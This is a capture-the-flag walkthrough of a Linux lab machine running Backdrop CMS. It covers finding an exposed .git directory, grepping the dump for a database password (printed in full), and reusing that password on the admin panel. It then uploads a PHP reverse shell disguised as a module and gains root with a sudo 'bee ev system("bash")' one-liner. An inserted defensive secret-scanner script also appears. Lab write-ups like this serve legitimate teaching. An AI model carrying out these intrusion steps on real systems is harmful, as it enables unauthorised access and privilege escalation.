Linux - Easy - Dog

Recon

Only ports 22 and 80 are open.
Subdomain enumeration is not useful here: every vhost name returns 200 with a different size.
The main site is powered by Backdrop CMS.

└──╼ $dirsearch --url 10.129.45.144

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460

Output File: /home/user/reports/_10.129.45.144/_25-03-10_21-16-23.txt

Target: http://10.129.45.144/

[21:16:24] Starting: 
[21:16:26] 301 -  313B  - /.git  ->  http://10.129.45.144/.git/
[21:16:27] 200 -   23B  - /.git/HEAD
[21:16:27] 200 -  412B  - /.git/branches/
[21:16:27] 200 -   95B  - /.git/COMMIT_EDITMSG
[21:16:27] 200 -   92B  - /.git/config
[21:16:27] 200 -  607B  - /.git/
[21:16:27] 200 -   73B  - /.git/description
[21:16:27] 200 -  653B  - /.git/hooks/
[21:16:27] 200 -  240B  - /.git/info/exclude
[21:16:27] 200 -  458B  - /.git/info/
[21:16:27] 301 -  329B  - /.git/logs/refs/heads  ->  http://10.129.45.144/.git/logs/refs/heads/
[21:16:27] 200 -  230B  - /.git/logs/HEAD
[21:16:27] 200 -  479B  - /.git/logs/
[21:16:27] 301 -  323B  - /.git/logs/refs  ->  http://10.129.45.144/.git/logs/refs/
[21:16:27] 200 -  230B  - /.git/logs/refs/heads/master
[21:16:27] 301 -  324B  - /.git/refs/heads  ->  http://10.129.45.144/.git/refs/heads/
[21:16:27] 200 -   41B  - /.git/refs/heads/master
[21:16:27] 301 -  323B  - /.git/refs/tags  ->  http://10.129.45.144/.git/refs/tags/
[21:16:27] 200 -  463B  - /.git/refs/
[21:16:27] 200 -  337KB - /.git/index
[21:16:28] 200 -    2KB - /.git/objects/
[21:16:38] 301 -  313B  - /core  ->  http://10.129.45.144/core/
[21:16:40] 301 -  314B  - /files  ->  http://10.129.45.144/files/
[21:16:40] 200 -  588B  - /files/
[21:16:42] 404 -    2KB - /index.php/login/
[21:16:42] 200 -  458B  - /layouts/
[21:16:43] 200 -    7KB - /LICENSE.txt
[21:16:44] 301 -  316B  - /modules  ->  http://10.129.45.144/modules/
[21:16:44] 200 -  406B  - /modules/
[21:16:48] 200 -    5KB - /README.md
[21:16:51] 200 -  528B  - /robots.txt
[21:16:51] 403 -  278B  - /server-status
[21:16:51] 403 -  278B  - /server-status/
[21:16:52] 200 -    0B  - /settings.php
[21:16:52] 301 -  314B  - /sites  ->  http://10.129.45.144/sites/
[21:16:54] 301 -  315B  - /themes  ->  http://10.129.45.144/themes/
[21:16:54] 200 -  457B  - /themes/

We can download all of the files using gitdumper.
git log shows that there is only one commit, so nothing interesting there.
Searching the dump for passwords by hand is tedious because of the number of files, but find and grep make it manageable.

grep -ri "\$database" . finds us ./settings.php:$database = 'mysql://root:BackDropJ2024DS2024@127.0.0.1/backdrop';

MySQL is not reachable from outside (only 22 and 80 are open), and these are not valid credentials for the Backdrop CMS admin panel.
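A defender's counterpart to the grep above, added here as an example that is not part of the write-up: a small Python scanner that flags DSN-style connection strings with embedded passwords in a checkout, the kind of finding that belongs in a pre-commit or CI secret check rather than in a dumped .git. The settings.php samples are constructed, with a placeholder password; the function and constant names are mine.

```python
import os
import re
from urllib.parse import urlsplit

# Matches scheme://user:password@host... (a DSN carrying inline credentials).
DSN_RE = re.compile(r"\b[a-z][a-z0-9+.-]*://[^\s'\"/@]+:[^\s'\"/@]+@[^\s'\"]+", re.I)

def find_embedded_credentials(text, filename="<text>"):
    """One finding per DSN-style URL with a password; the password is masked in
    the report so the report itself does not become another copy of the secret."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for match in DSN_RE.finditer(line):
            url = match.group(0)
            parts = urlsplit(url)
            if not parts.password:  # user@host without a password is not a leak
                continue
            findings.append({
                "file": filename, "line": lineno, "scheme": parts.scheme.lower(),
                "username": parts.username, "host": parts.hostname,
                "masked": url.replace(parts.password, "***"),
            })
    return findings

def scan_tree(root, skip_dirs=(".git",), max_bytes=2_000_000):
    """Walk a checkout (skipping VCS metadata) and scan every readable file."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d not in skip_dirs]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                if os.path.getsize(path) > max_bytes:
                    continue
                with open(path, encoding="utf-8", errors="ignore") as fh:
                    findings.extend(find_embedded_credentials(fh.read(), path))
            except OSError:
                continue
    return findings

# Constructed sample shaped like the line the write-up found; placeholder password.
SAMPLE_SETTINGS_PHP = """<?php
// constructed sample
$database = 'mysql://root:Pl4ceholderPass@127.0.0.1/backdrop';
"""

# Hardened form: the DSN comes from the environment, so the scanner finds nothing.
SAFE_SETTINGS_PHP = """<?php
$database = getenv('BACKDROP_DB_DSN');
"""
```

Run scan_tree on a checkout root to get the same findings for every file; a non-empty result is the signal to rotate the credential, not just to remove the line.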

Looking further, grep -ri "@dog.htb" . finds ./files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active/update.settings.json, which contains "tiffany@dog.htb".

That username with the database password gets us into the admin panel. We are in.

Abusing admin panel

We use the standard CMS trick: upload a new theme/module containing a PHP reverse shell, which calls back to us once the file is requested.

We have to create a new directory, add the php-reverse-shell from http://pentestmonkey.net/tools/php-reverse-shell with our IP filled in, add a shell.info file (copied from another extension) and then tar it. We can upload it using "Manual installation". Then just request /modules/shell/shell.php to get the reverse shell.

There are two users on the server, jobert and johncusack; johncusack is our first target, as he owns user.txt.

I tried reusing tiffany's password, BackDropJ2024DS2024, and got in.

Priv esc

We have our first and probably last target right at the entrance.

bee is probably a tool to install Backdrop.

Reading further, we find a nice advanced option.

Running arbitrary PHP with root privileges basically makes us root, so we can just get a shell with sudo /usr/local/bin/bee --root='/var/www/html/' ev 'system("bash");'